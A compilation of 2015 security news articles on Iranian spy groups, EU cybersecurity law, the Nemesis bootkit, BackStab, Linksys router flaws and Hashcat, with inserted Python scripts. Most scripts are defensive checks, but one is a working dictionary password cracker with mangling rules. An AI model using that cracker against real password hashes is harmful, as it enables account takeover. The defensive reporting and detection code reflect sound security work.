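    "2015-12-10T13:10:00Z",  # Thu 16:40 Tehran / Thu 14:10 Berlin
    "2015-12-11T08:00:00Z",  # Fri 11:30 Tehran (weekend in Iran) / Fri 09:00 Berlin
    "2015-12-12T06:00:00Z",  # Sat 09:30 Tehran / Sat 07:00 Berlin
    "2015-12-12T14:20:00Z",  # Sat 17:50 Tehran / Sat 15:20 Berlin
]

# datetime.weekday(): Monday=0 ... Saturday=5, Sunday=6
SAT_TO_THU = {5, 6, 0, 1, 2, 3}   # Iran's business week (Saturday through Thursday)
MON_TO_FRI = {0, 1, 2, 3, 4}
WORK_HOURS = range(9, 18)         # assumed 09:00-17:59 local working window

# Candidate profiles: name -> (UTC offset, business weekdays).  Offsets are the
# December standard-time values; use zoneinfo for a DST-aware analysis.
CANDIDATES = {
    "Asia/Tehran": (timedelta(hours=3, minutes=30), SAT_TO_THU),
    "Europe/Berlin": (timedelta(hours=1), MON_TO_FRI),
}


def parse_utc(stamp: str) -> datetime:
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def activity_profile(events_utc, utc_offset, business_days, work_hours=WORK_HOURS):
    """Count how many events fall in the working hours / business days of one candidate."""
    tz = timezone(utc_offset)
    local = [parse_utc(e).astimezone(tz) for e in events_utc]
    in_hours = [d.hour in work_hours for d in local]
    on_days = [d.weekday() in business_days for d in local]
    return {
        "events": len(local),
        "in_work_hours": sum(in_hours),
        "on_business_days": sum(on_days),
        "in_both": sum(h and d for h, d in zip(in_hours, on_days)),
    }


def rank_candidates(events_utc, candidates=CANDIDATES):
    """Return candidate names ordered by how much activity fits their work pattern."""
    scored = {name: activity_profile(events_utc, off, days)
              for name, (off, days) in candidates.items()}
    ordered = sorted(scored, key=lambda n: scored[n]["in_both"], reverse=True)
    return ordered, scored


if __name__ == "__main__":
    order, scores = rank_candidates(SAMPLE_EVENTS_UTC)
    for name in order:
        s = scores[name]
        print(f"{name:14s} work-hours {s['in_work_hours']}/{s['events']}  "
              f"business-days {s['on_business_days']}/{s['events']}  "
              f"both {s['in_both']}/{s['events']}")
```

Timing alone is a weak signal; Symantec combined it with the calendar-format strings and C&C registration data before drawing a conclusion.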

“Two Iran-based attack groups that appear to be connected, Cadelle and Chafer, have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations.” states a report published by Symantec.

Although the hackers used custom-made malware that isn't particularly sophisticated, the attackers remained under the radar for a long time and gained access to "an enormous amount of sensitive information."

Let's take a closer look at the malware used by the Iran-based hackers: Cadelle uses a piece of malware called Backdoor.Cadelspy, while Chafer relies on Backdoor.Remexi.

The researchers collected evidence suggesting that the two teams may be connected. Chafer compromised web servers, likely through SQL injection attacks, to drop Backdoor.Remexi onto targeted systems. The Remexi botnet was used to gain control over the victims' PCs, stealing user login credentials for use in lateral movement.

The analysis of Cadelspy's file strings revealed that some dates use the Solar Hijri calendar format, which is very common in Afghanistan and Iran.

Most of the affected organizations are based in the Middle East, in countries such as Saudi Arabia and Afghanistan, while one victim organization is located in the US.


Both groups are small; the experts at Symantec speculate they are composed of five to 10 people, and they don't share the same attack infrastructure.

“The Cadelle and Chafer groups also keep the same working hours and focus on similar targets. However, no sharing of C&C infrastructure between the teams has been observed.” reads the report.

“If Cadelle and Chafer are not directly linked, then they may be separately working for a single entity. Their victim profile may be of interest to a nation state.”

Another interesting aspect of the two Iran-based groups is that several machines were found infected with both Cadelspy and Remexi, and the infections occurred within minutes of one another.

“One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application,” Symantec wrote. “Other compromised computers included those belonging to web developers or are file and database servers.”

The malware also targeted people using anonymous proxies, which activists and dissidents use to hide their identity online and avoid censorship.

“Reports have shown that many Iranians avail of these services to access sites that are blocked by the government’s Internet censorship,” Symantec wrote. “Dissidents, activists, and researchers in the region may use these proxies in an attempt to keep their online activities private.”

Symantec confirmed that Cadelle and Chafer are still active today and will continue their operations.

EU regulation to Impose rules on firms to improve cybersecurity

EU member states and lawmakers have prepared a first draft of EU cybersecurity regulation that will force companies to improve security and report security breaches and cyber incidents.
EU member states plan to impose rules on companies to prevent cyber attacks; on Monday they agreed on the first draft of the regulation, which will force companies in various industries to increase cybersecurity and disclose any incident by reporting it to the authorities.

The regulation will impact any sector, including financial, health care and transportation.

“This agreement is a major step in raising the level of cybersecurity in Europe, one of the objectives of the EU cybersecurity strategy and a cornerstone in our efforts towards a Digital Single Market,” the European Union's digital commissioner Guenther Oettinger wrote on his blog.
The EU regulation will oblige IT giants, Internet and cloud service providers, and online marketplaces like Amazon, eBay, and Google to ensure the safety of their infrastructure and to disclose and share information about major incidents.

In this phase small digital companies will be exempted from the rules; however, I believe the regulation will be adapted in the future to also consider the specific situation of this category of businesses.


As explained by Oettinger, the EU regulation is a necessary action to respond to cybercrime and mitigate its impact on the EU economy.

“Every day, cybercrime and cyberattacks cause major economic damage to European businesses and our economy. This amounts to hundreds of billions of euro each year. Even ordinary families and children cannot escape this risk,” Oettinger says. “I will not sit back and let these criminals and cyber terrorists attack our businesses, intrude into our private lives and destroy trust in our digital economy and society.”

The new EU rules in cyber security will act on three levels:

improving cybersecurity in EU countries by forcing Member States to have a national strategy;
improving cooperation between the Computer Security Incident Response Teams of the Member States and sharing information about cyber attacks and risks;
forcing companies that provide essential services (i.e. power companies, financial institutions, transport providers, healthcare and digital infrastructure) to take appropriate security measures and inform the authorities when they suffer a major cyber incident.
“The rules will make digital networks and services more secure and reliable. Consumers will have more confidence in the technologies, services and systems they rely on day-to-day. The EU economy will benefit as sectors that depend on Network and Information Security will be backed up by cybersecurity teams at home and across Europe. Governments and businesses can be confident that digital networks and critical infrastructure such as the electricity, gas and transport sectors can securely provide their essential services at home and across borders.” continues the post.

The new rules will also impact companies outside the IT sector that rely on technology to provide their services, so that the gas and transport sectors, among others, “can securely provide their essential services at home and across borders.”

The EU cybersecurity regulation still has to be approved by the European Parliament, but cybersecurity experts believe that the 28 EU member states will accelerate the process given the criticality of the field.

What do the new EU cybersecurity regulations require?

9.12.2015 Security
By the end of 2017, two new EU legal acts governing information security and data protection should enter into force. They will fundamentally affect how organizations in EU member states handle their protection and how they report security breaches and data loss.

The Network and Information Security (NIS) Directive and the General Data Protection Regulation (GDPR) will in some way affect all organizations within the EU, regardless of their size.

They set a standard for information security and data protection and harmonize the rules across the individual member states. The aim is to reduce the number of security incidents and leaks of data and personal information.

The NIS Directive will require the involvement of a whole range of private-sector companies, which will help implement the new requirements on security and incident reporting.

The directive stipulates that "operators of critical infrastructure" (organizations in the fields of utilities, transport, the public sector and financial services) will deploy appropriate measures for managing security risks and report serious incidents to national authorities or a special cyber emergency team.

The GDPR will consolidate the existing data protection regulations of the EU countries into a single law, so that there will be uniform guidance on how organizations must handle personally identifiable information (PII), i.e. any information that makes it possible to directly or indirectly identify a natural person.

This will apply to all organizations operating in Europe, regardless of whether the data enabling identification of persons is stored within the borders of the European Union or not. The definition of "personal data" will also be broadened to include e-mail addresses, IP addresses and content published on social networks.

What does this mean for organizations?

The key point is that these directives and regulations will become enforceable, so organizations that do not comply with NIS or the GDPR risk severe penalties in the event of a security breach. The proposed fines are 5% of global annual turnover (depending on the segment) or up to EUR 100 million.

The new legislation will increase the responsibility of organizations, but it is also an opportunity for them to reassess their existing security practices. Changes in cybersecurity can ultimately help open new business opportunities and gain a competitive advantage.

Some of the GDPR proposals mirror the NIS Directive, especially regarding the security of systems and data, and the same applies to some of the penalties. But the GDPR has far more detail related to the regulation and handling of the personally identifiable information (PII) of EU citizens.

Who will the GDPR apply to?

Every organization offering goods or services within the EU member states will be subject to the GDPR. This removes the current ambiguity about whether data protection legislation applies in a given country or region. Every organization doing business within the EU and handling the personal data of EU data subjects should adopt measures that ensure compliance.

"If organizations want to minimize risk, they should collect and process only the information genuinely necessary for the given purpose. It is also necessary not to retain personal data longer than needed. Various automated policies can help here, ensuring that unneeded data is immediately and securely destroyed and erased, so that no penalty is at risk," says David Řeháček, marketing head for Southern and Eastern Europe at Check Point Software Technologies.

Notification of security breaches and data leaks

Current security regulations only propose that organizations implement "appropriate" technical security measures and choose suitable business practices, but they do not specify exactly how to proceed or what such a secure solution should specifically look like. Nevertheless, protection should include recognized measures such as data encryption and a firewall, and procedurally organizations should notify regulators and affected individuals of security breaches within 72 hours.

"The number of cyberattacks is constantly growing, their sophistication is increasing and massive data leaks are unfortunately fairly common, so it is likely that the initial fines under the new regulations will be very high. Cybersecurity therefore cannot be taken lightly," adds Řeháček.

Penalties and their enforcement

Currently there are large differences in penalties and their enforcement across the countries of the European Union. The GDPR will remove these differences and introduce strict penalties. Penalties of up to EUR 100 million or up to 5% of the organization's global annual turnover are proposed.

Protection of personal data will be an integral part of the organization. Organizations must build security measures into all technical and organizational processes and procedures from the very beginning. Security needs to be worked on already during the preparatory phases so that it is an integral part of the company at all levels.

A change in the approach to suppliers

Under the new legislation the entire supply chain, from suppliers to customers, will be jointly responsible for data protection. It will therefore no longer be possible to transfer responsibility for data security. This means that organizations processing large amounts of personally identifiable information will have to apply data security measures and also audit their partners to guarantee that they too process personal data securely.

Data protection officers

It is not yet clear whether organizations will have to appoint a Data Protection Officer (DPO) under the GDPR, who would be responsible for managing and protecting internal data and for compliance with regulations and processes.

In any case, organizations must be prepared to handle additional security, data management and reporting internally. Given the importance of these tasks, such a person should be in a management position and should be prepared to devote most of their time to them.

The new EU legislation governing cybersecurity and data protection will have a fundamental impact on how many organizations in EU member states handle their security and how they report incidents and data loss. However, organizations should treat the new legislation as an opportunity to rework their approach to cybersecurity, not just for compliance, because strengthening security can bring them a competitive advantage.

Nemesis Bootkit — A New Stealthy Payment Card Malware

Another day, another stunning Malware – this time targeting banks, payment card processors, and other financial services.
Security researchers have uncovered a sophisticated payment card malware that executes before the operating system boots, making the malware very difficult to detect and even harder to remove.
The malware in question is part of "Nemesis" – a malware suite that includes all software programs for capturing screens, transferring files, injecting processes, logging keystrokes, and carrying out other malicious activities on the infected computers.
Nemesis malware family has been seen in the past, targeting banks, ATMs, financial transaction processing, credit unions, and financial business service companies.
Nemesis Bootkit Malware – Reappears even after Re-installation of the OS
The malware with bootkit functionality has been in operation since early this year and has the ability to modify the legitimate VBR (Volume Boot Record), which makes it possible for the malware to load before Windows starts.
This makes the malicious threat hard to detect and remove using traditional security approaches.
Moreover, the malware resides in a low-level portion of a hard drive.
This makes the malware infection reappear even after a complete reinstallation of the Windows operating system.
"The malware that persists outside of the operating system (OS) requires a different approach to detection and eradication," security analysts from FireEye wrote in a blog post published Monday.
"Malware with bootkit functionality can be installed and executed almost entirely independent of the Windows [OS]. As a result, incident responders will need tools that can access and search raw disks at scale for evidence of bootkits."
How Does the Malware Work?
Early this year, the cyber criminals tweaked Nemesis to include a utility called BOOTRASH that has the ability to modify an infected computer’s boot process.
In a normal boot, any Windows PC reads data from a hard drive's MBR (Master Boot Record) that loads the VBR – a piece of code specific to an operating system containing instructions for the OS to begin the boot process.
The process typically looks like this:
The VBR then normally loads the operating system code, but BOOTRASH instead loads:
First, the malicious code that injects the Nemesis components stored in the virtual file system into the Windows kernel
Then, the operating system code
Since BOOTRASH is loaded outside of the machine's OS, it is not subject to any kind of integrity check, nor are any of its components scanned by the system's anti-virus program, which helps the malware evade detection.
According to the researchers, versions of BOOTRASH are targeting both 32-bit and 64-bit Windows architectures. Moreover, due to this newly added Bootkit component, reinstalling the OS will not remove the Nemesis malware.
Hackers behind Nemesis Malware
FireEye researchers believe the Nemesis bootkit malware belongs to a financial crime group of hackers, likely based in Russia, called FIN1.
"We identified the presence of a financially motivated threat group that we track as FIN1, whose activity at the organization dated back several years," FireEye researchers wrote. "The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s)."
The researchers believe that the FIN1 hacking group used this malware, most of the time, to access victims' environments and steal cardholder data. In the past, the researchers came across different versions of the Nemesis family when they analyzed FIN1's malware.
How to Protect Your Systems From Nemesis Bootkit Malware?
Re-installing the operating system of your Windows machine is not a sufficient method to get rid of this malware.
The solution against this malware threat is to use software tools that can access and scan raw disks at scale for evidence of Bootkits, or physically wipe the disks before reinstalling the operating system.
"System administrators should perform a complete physical wipe of any systems compromised with a bootkit and then reload the operating system," FireEye researchers recommend.
Nemesis is by no means the first malware family to hijack the normal boot process of a PC in an effort to gain persistence and stealth, nor is it the first malware family to contain bootkit functionality.
In the past, researchers detected malicious threats such as TDL4 (Olmarik), Rovnix, Necurs, and Carberp. Among these, Carberp banking trojan targeted financial institutions.

Like it or not, Microsoft Plans to Push Windows 10 Upgrade more Aggressively
This is no surprise that Microsoft wants you to install Windows 10.
But, Hey Microsoft, Not everyone wants to upgrade to Windows 10. Many people are happy with Windows 7 or Windows 8.1 OS and don’t want to switch to the newest Windows 10 operating system.
Days after the launch of Windows 10, Microsoft started offering Free Windows 10 installation to every Windows user. The marketing strategy successfully worked for Microsoft and just within a week after the launch, Windows 10 started running on millions of PCs.
Then the company went into planning other tricks in order to get on to the maximum number of PCs as possible. It silently started pushing Windows 10 installation files on PCs running Windows 7 or Windows 8.1, even if users have not opted into the upgrade.
Less than two months ago, some Windows 7 and 8.1 users also claimed that Windows 10 had begun to install itself automatically on their PCs, which Microsoft later called a mistake.
More Aggressive Windows 10 Upgrade Strategy
Now, Microsoft is going to kick off a more aggressive Windows 10 Upgrade strategy.
The new operating system that showed up first as optional, and then as recommended download in Windows Update, will soon show up – "Yes, I want to upgrade."
Yes, those Windows 7 or 8.1 users who are trying to block the Windows 10 upgrade will find that the upgrade has just not gone away.
This is because Microsoft has recently made some changes to settings on Windows 7 and 8.1 machines that were previously configured not to receive the Windows 10 upgrade.
The settings have been reset by one of the updates the company deployed on Windows 7 and Windows 8.1 machines, which keeps checking every day to make sure that no other changes are made to this behavior.
Windows 10 Update Being Re-offered Several Times
The issue was reported by Josh Mayfield, the creator of GWX Control Panel, an app used to block the upgrade to Windows 10.
The developer received several reports from his users who said that their preference not to upgrade to Windows 10 was being reset, up to several times a day, and that the Windows 10 update was presented to them again.
"Over Thanksgiving weekend I started getting reports that the Windows Update 'AllowOSUpgrade' setting was getting flipped back on on a number of peoples' PCs, and it keeps resetting itself at least once a day if they switch it back off," Josh Mayfield said as reported by Computerworld.
Microsoft stated about a month ago that it intends to push the new operating system much more aggressively in the new year, re-categorizing Windows 10 as a "Recommended Update" in its Windows Update service.
So don’t be surprised if, in coming days, the Windows 10 installation process starts again, and again, until you finally lay down your arms and allow the Windows 10 upgrade, or simply move on to another operating system.

BackStab Malware steals iOS and BlackBerry Backups

Security experts at Palo Alto Networks have uncovered a new strain of malware dubbed BackStab that steals local mobile data backups.
Security experts at Palo Alto Networks have uncovered a new strain of malware dubbed BackStab that steals local mobile data backups and transfers them to the C&C server.

The malware is not able to steal data from the mobile device itself; instead it searches the infected PC for data backups. The malware scans for backups created by the mobile devices or by any other software that creates automatic backups.

BackStab Malware is able to Steal both iOS and BlackBerry Backups via compromised computers.

The malware exploits the fact that many backup tools don't implement encryption, so the malicious code easily finds the backups and accesses the data they contain.

As explained by the experts, the BackStab malware doesn’t need to have higher-level privileges or root access to the device or the infected computer.

BackStab has been in the wild for over five years; the experts at Palo Alto Networks have discovered six trojan families that used the technique to steal backup data in attacks across 30 countries.

“We have identified 704 samples of six Trojan, adware and HackTool families for Windows or Mac OS X systems that used this technique to steal data from iOS and BlackBerry devices. These attacks have been in the wild for over five years, and we have observed them deployed in over 30 countries around the world,” states a blog post published by Palo Alto Networks.


According to Palo Alto researchers, BackStab does not yet support Android backups.

The experts provided a detailed description about how the BackStab works and mitigation strategies.

“Under certain conditions, mobile devices automatically create un-encrypted backup files on a local computer when they are attached through a USB port. Apple iOS devices began doing this when iTunes backup was introduced with the first generation iPhone in 2007. When users choose the default backup options, the contents of their phone is stored, unencrypted, on their computer's local hard drive in a well-known location. Forensics experts have known about this behavior for years and have exploited it to gain access to iOS device content even when they cannot directly access an iPhone due to its strong protections.”

Security experts suggest that users use a backup solution that implements data encryption, keep the OS and applications up to date, and “do not click “Trust” on the popup that appears every time they connect their phone to a new computer.”
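A practitioner can check the first of those recommendations on an endpoint fleet by inspecting the backups themselves. The script below is an added example, not Palo Alto Networks' tooling; it assumes each backup is a folder under the MobileSync/Backup directory containing a Manifest.plist whose boolean IsEncrypted key records whether the backup was password-protected, and that the default root paths are the usual macOS and Windows locations.

```python
"""Audit local iTunes-style device backups for the unencrypted state BackStab abuses.

Added example, not Palo Alto Networks' tooling.  Assumptions: each backup is a
folder under MobileSync/Backup holding a Manifest.plist whose boolean
IsEncrypted key records whether the backup was password-protected, and the
default root paths are the usual macOS and Windows locations.
"""
import os
import plistlib
import tempfile
from datetime import datetime
from pathlib import Path


def default_backup_roots():
    """Where iTunes keeps backups on macOS and on Windows (assumed paths)."""
    return [
        Path.home() / "Library" / "Application Support" / "MobileSync" / "Backup",
        Path(os.environ.get("APPDATA", "")) / "Apple Computer" / "MobileSync" / "Backup",
    ]


def audit_backup(backup_dir: Path):
    """Return a summary for one backup folder, or None if it has no manifest."""
    manifest = Path(backup_dir) / "Manifest.plist"
    if not manifest.is_file():
        return None
    with manifest.open("rb") as fh:
        data = plistlib.load(fh)
    return {
        "path": str(backup_dir),
        "encrypted": bool(data.get("IsEncrypted", False)),
        "date": data.get("Date"),
    }


def audit_root(root: Path):
    """Summaries for every backup folder under a MobileSync/Backup root."""
    root = Path(root)
    if not root.is_dir():
        return []
    results = [audit_backup(d) for d in sorted(root.iterdir()) if d.is_dir()]
    return [r for r in results if r is not None]


def unencrypted_backups(root: Path):
    """The backups a BackStab-style trojan could read directly."""
    return [r for r in audit_root(root) if not r["encrypted"]]


# --- constructed demo data ---------------------------------------------------
def write_sample_backup(root: Path, udid: str, encrypted: bool):
    """Create a folder with a minimal constructed Manifest.plist (demo only)."""
    folder = Path(root) / udid
    folder.mkdir(parents=True, exist_ok=True)
    manifest = {"IsEncrypted": encrypted, "Version": "10.0", "Date": datetime(2015, 12, 1)}
    with (folder / "Manifest.plist").open("wb") as fh:
        plistlib.dump(manifest, fh)
    return folder


def run_demo():
    """Build two constructed backups in a temp dir and audit them."""
    root = Path(tempfile.mkdtemp(prefix="mobilesync_demo_"))
    write_sample_backup(root, "00000000-ENCRYPTED-DEMO", encrypted=True)
    write_sample_backup(root, "00000000-PLAINTEXT-DEMO", encrypted=False)
    return {"root": str(root), "all": audit_root(root), "unencrypted": unencrypted_backups(root)}


if __name__ == "__main__":
    demo = run_demo()
    print(f"{len(demo['unencrypted'])} of {len(demo['all'])} demo backups are unencrypted")
    for backup_root in default_backup_roots():           # then the real locations, if any
        for r in unencrypted_backups(backup_root):
            print("UNENCRYPTED backup:", r["path"], r["date"])
```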

Nemesis, a bootkit used to steal payment card data

Nemesis is a new strain of malware, very hard to detect and remove, designed to steal payment card data and implementing bootkit functionalities.
Experts at FireEye have discovered a new strain of malware designed to steal payment card data. Nothing new, you are probably saying, but this malware dubbed Nemesis is very difficult to detect and remove.

FireEye has identified the threat actor behind the new Nemesis malware: it is the hacking crew FIN1, which is suspected of being a group of criminals from Russia.

The FIN1 criminal gang has been known to target financial institutions worldwide; it used the Nemesis malicious code to compromise an unnamed organization that processes financial transactions.


Organizations in the retail industry that manage payment card data are privileged targets of cyber criminal gangs; Target, Home Depot and Neiman Marcus are just a few of the illustrious victims of cyber crime.

Nemesis belongs to the family of malware known as bootkits. BIOS bootkits were mentioned when Snowden disclosed the catalog of surveillance tools used by the NSA ANT division; this kind of malware is able to compromise the BIOS of the victim's machine, ensuring persistence and implementing sophisticated evasion techniques.

“In September, Mandiant Consulting identified a financially motivated threat group targeting payment card data using sophisticated malware that executes before the operating system boots. This rarely seen technique, referred to as a ‘bootkit’, infects lower-level system components making it very difficult to identify and detect,” states FireEye in a blog post. “The malware’s installation location also means it will persist even after re-installing the operating system, widely considered the most effective way to eradicate malware.”

Even when the operating system is reinstalled, the bootkit can remain in place.

“Malware with bootkit functionality can be installed and executed almost completely independent of the Windows operating system,” the post continues.

In early 2015, the FIN1 threat actors added to their arsenal a utility that modifies the legitimate system Volume Boot Record (VBR) and hijacks the system boot process; in this way the criminals ensure the Nemesis malware is loaded before the Windows operating system. The experts at FireEye called the utility BOOTRASH, and the only way to detect it is to use a raw disk scanner.

“Similarly, re-installing the operating system after a compromise is no longer sufficient. System administrators should perform a complete physical wipe of any systems compromised with a bootkit and then reload the operating system.”

The experts at FireEye Mandiant have found the bootkit by using a tool called Mandiant Intelligent Response (MIR) that allows for raw disk access and scan.
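Both Nemesis write-ups on this page make the same point: a VBR hook is invisible from inside the running OS, so responders must read the disk raw and compare what is there with a known-good record. The script below is an added example, not FireEye's MIR tooling; the disk images, the minimal NTFS-like VBR and the "hook" (a redirected jump target) are all constructed for the demonstration.

```python
"""Raw-disk VBR integrity check, the kind of offline comparison the articles recommend.

Added example, not FireEye's MIR tooling.  It parses the MBR partition table
of a raw disk image, reads the boot partition's Volume Boot Record straight
from the image (bypassing the running OS, which a bootkit can deceive) and
compares it with a known-good baseline hash.  The images here are constructed.
"""
import hashlib
import struct

SECTOR = 512
BOOT_SIGNATURE = b"\x55\xaa"
PARTITION_TABLE = 0x1BE   # four 16-byte entries follow the 446-byte MBR code


def parse_mbr_partitions(mbr: bytes):
    """Return the non-empty partition entries of a classic MBR."""
    if len(mbr) < SECTOR or mbr[510:512] != BOOT_SIGNATURE:
        raise ValueError("not a valid MBR sector")
    parts = []
    for i in range(4):
        base = PARTITION_TABLE + 16 * i
        status, ptype = mbr[base], mbr[base + 4]          # CHS fields at +1..+3, +5..+7 ignored
        lba_start, sectors = struct.unpack_from("<II", mbr, base + 8)
        if ptype != 0:
            parts.append({"index": i, "bootable": status == 0x80, "type": ptype,
                          "lba_start": lba_start, "sectors": sectors})
    return parts


def boot_partition(parts):
    """Prefer the entry flagged active; fall back to the first partition."""
    return next((p for p in parts if p["bootable"]), parts[0])


def check_vbr(image: bytes, baseline_sha256: str):
    """Locate the VBR in a raw image and report deviations from the baseline."""
    part = boot_partition(parse_mbr_partitions(image[:SECTOR]))
    start = part["lba_start"] * SECTOR
    vbr = image[start:start + SECTOR]
    findings = []
    if vbr[510:512] != BOOT_SIGNATURE:
        findings.append("VBR lacks 0x55AA boot signature")
    digest = hashlib.sha256(vbr).hexdigest()
    if digest != baseline_sha256:
        findings.append("VBR differs from known-good baseline (possible bootkit hook)")
    return {"partition": part["index"], "sha256": digest, "findings": findings}


# --- constructed sample images ---------------------------------------------
def make_vbr(jump_target: int) -> bytes:
    """Minimal NTFS-like VBR: short jump, OEM id, zero-filled body, signature."""
    vbr = bytearray(SECTOR)
    vbr[0:3] = b"\xeb" + bytes([jump_target]) + b"\x90"   # JMP short <target>; NOP
    vbr[3:11] = b"NTFS    "
    vbr[510:512] = BOOT_SIGNATURE
    return bytes(vbr)


def make_image(vbr: bytes, lba_start: int = 8) -> bytes:
    """Raw image with one bootable NTFS (0x07) partition starting at lba_start."""
    mbr = bytearray(SECTOR)
    struct.pack_into("<BBBBBBBBII", mbr, PARTITION_TABLE,
                     0x80, 0, 0, 0, 0x07, 0, 0, 0, lba_start, 64)
    mbr[510:512] = BOOT_SIGNATURE
    image = bytearray(SECTOR * (lba_start + 64))
    image[0:SECTOR] = mbr
    image[lba_start * SECTOR:(lba_start + 1) * SECTOR] = vbr
    return bytes(image)


CLEAN_VBR = make_vbr(0x52)    # jumps into the legitimate boot code
HOOKED_VBR = make_vbr(0x70)   # jump redirected, the way a bootkit patches the VBR
BASELINE = hashlib.sha256(CLEAN_VBR).hexdigest()   # recorded from a known-good system

if __name__ == "__main__":
    for label, img in (("clean", make_image(CLEAN_VBR)), ("hooked", make_image(HOOKED_VBR))):
        print(label, check_vbr(img, BASELINE))
```

On a real host the image would come from a raw device read or a forensic image taken offline, and the baseline from an identical build before compromise.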

Linksys wireless routers are open to cyber attacks

According to an advisory published by the KoreLogic firm the Linksys EA6100-6300 wireless routers are vulnerable to attacks due to flawed CGI scripts.
Once again IoT devices are in the headlines, and once again SOHO routers are affected by a security vulnerability that exposes users to cyber attacks. According to the KoreLogic firm, the flawed devices are the Linksys EA6100-6300 wireless routers; the company has published an advisory reporting that security issues affect the CGI scripts in the admin interface, opening the device to remote attacks.

“Multiple CGI scripts in the web-based administrative interface of the Linksys EA6100 – EA6300 Wireless Router allow unauthenticated access to the high-level administrative functions of the device.” the advisory says

“This vulnerability can be leveraged by an unauthenticated attacker to obtain the router’s administrative password and subsequently arbitrarily configure the device.”


Many of the CGI scripts in the admin interface provide an attacker with unauthenticated access to the device allowing him to get the router’s admin password.

“Other CGI files that are accessible from an unauthenticated perspective can be used to configure settings for the affected device. This led to the development of an exploit to abuse these vulnerabilities.” the advisory continues.

The flawed scripts include bootloader, sysinfo.cgi, ezwifi_cfg.cgi, qos_info.cgi and others.

KoreLogic reported the issue to Linksys but is still waiting for a reply. The Linksys EA6100-6300 routers are consumer products, which means that once a security update becomes available end users will have to apply it themselves. Unfortunately, in many cases end users fail to apply patches and remain exposed to attack.

Matt Bergin of KoreLogic also published proof-of-concept code along with the advisory. The PoC includes code for testing whether Linksys EA6100-6300 routers still use the factory admin password.

While waiting for a fix, I suggest disabling remote admin access on your Linksys EA6100-6300 wireless router.

Hashcat, the fastest Password Cracking utility is now Open Source

Hashcat, the popular password recovery tool, has been released as open source under the MIT license. You can contribute to it.
The popular password cracking tool Hashcat is now open source software. The announcement was first made on December 4 on Twitter via an MD5 hash, which decoded to the following message:

“hashcat open source”

The source code for both utilities, Hashcat and oclHashcat, is now available in the GitHub repository.

The main Hashcat developer, Jens ‘atom’ Steube, later published a post on the official Hashcat forum announcing the availability of the source code for both Hashcat and oclHashcat.

Hashcat is a fast and advanced CPU-based password recovery utility, while oclHashcat is the GPGPU-based version of the tool.
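To make concrete what a tool like Hashcat automates, here is an added example (not Hashcat code) of the basic technique: a dictionary attack in which each wordlist entry is expanded by mangling rules, hashed, and compared against one or many target digests. Hashcat does this for hundreds of hash types and at GPU speed; this script does it for MD5/SHA-1/SHA-256 in pure Python. The wordlist, the rule set and the targets are constructed here for illustration and loosely mimic the style of hashcat/JtR rules; the tweet's own MD5 is recovered from the phrase "hashcat open source" in the wordlist.

```python
"""Dictionary attack with mangling rules, single- and multi-hash mode.
Added example; not Hashcat code. Wordlist and rules are constructed."""
import hashlib

# Constructed wordlist; a real run uses a large leaked-password list.
WORDLIST = ["password", "letmein", "hashcat open source", "summer", "admin"]


# Mangling rules: each takes one base word and yields candidate variants.
def rule_identity(word):
    yield word


def rule_capitalize(word):
    yield word.capitalize()


def rule_append_digits(word):
    for d in range(100):            # word0 .. word99
        yield f"{word}{d}"


def rule_leet(word):
    yield word.replace("a", "4").replace("e", "3").replace("o", "0")


RULES = [rule_identity, rule_capitalize, rule_append_digits, rule_leet]

HASHERS = {
    "md5": lambda s: hashlib.md5(s.encode()).hexdigest(),
    "sha1": lambda s: hashlib.sha1(s.encode()).hexdigest(),
    "sha256": lambda s: hashlib.sha256(s.encode()).hexdigest(),
}


def candidates(wordlist, rules):
    """Generate every (word, rule) expansion in order."""
    for word in wordlist:
        for rule in rules:
            yield from rule(word)


def crack(target_hex, algo="md5", wordlist=WORDLIST, rules=RULES):
    """Return the plaintext whose digest equals target_hex, or None."""
    hasher = HASHERS[algo]
    target_hex = target_hex.lower()
    for cand in candidates(wordlist, rules):
        if hasher(cand) == target_hex:
            return cand
    return None


def crack_many(targets, algo="md5", wordlist=WORDLIST, rules=RULES):
    """Multi-hash mode: hash each candidate once and look it up in a set of
    pending targets, the same idea that lets Hashcat attack a whole dump in
    one pass. Returns {digest: plaintext} for everything recovered."""
    hasher = HASHERS[algo]
    pending = {t.lower() for t in targets}
    found = {}
    for cand in candidates(wordlist, rules):
        digest = hasher(cand)
        if digest in pending:
            found[digest] = cand
            pending.discard(digest)
            if not pending:
                break
    return found


if __name__ == "__main__":
    tweet = HASHERS["md5"]("hashcat open source")
    print(tweet, "->", crack(tweet))
    dump = [HASHERS["md5"]("admin"), HASHERS["md5"]("letmein7"), HASHERS["md5"]("nope")]
    print(crack_many(dump))
```

Unsalted, fast hashes such as MD5 and NTLM are exactly what makes this attack cheap: the cost is one hash per candidate, shared across every target in the dump. Password-hashing functions designed to be slow and salted (bcrypt, scrypt, PBKDF2) defeat the multi-hash shortcut and raise the per-candidate cost by orders of magnitude.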

hashcat ntlm

Why Did Hashcat Go Open Source?

Steube, a strong supporter of open source software, decided to release the software so that software and security experts can review the code and improve it, for example by integrating external libraries.

The software is released under the MIT license to allow easy integration and packaging for the most common Linux distributions.

“Actually, I am a big fan of open source software, and I’ve always held the idea of eventually going open source at some point in the future. The difficult questions were when would we be ready to do so, and when would be the best time to do it.” states the post.

Up until now, Hashcat has not been supported on OS X because Apple does not allow “offline” compiling of kernel code. Now that the project is open source, users will be able to compile the GPU kernels just in time and use oclHashcat on OS X as well.

“Currently there is no native support for OSX. The main reason for this is that Apple does not support “offline” compiling of the kernel code. Technically, the missing piece is what AMD allows through CL_CONTEXT_OFFLINE_DEVICES_AMD in its OpenCL runtime. This would allow the compilation of GPU kernels for devices which are not currently attached to the development system. With an open source project, you can easily compile the kernels using the Apple OpenCL Runtime “just in time”, also known as JIT, and hence lift that restriction. This means that support for oclHashcat on OSX would be possible for the first time.” Steube explains.

Steube has in the past worked with the experts at Kaspersky Lab, assisting them in cracking hashes related to the Gauss malware and the Equation group.

Experts at Kaspersky Lab published a blog post earlier this week explaining the benefits of password cracking tools going open source.

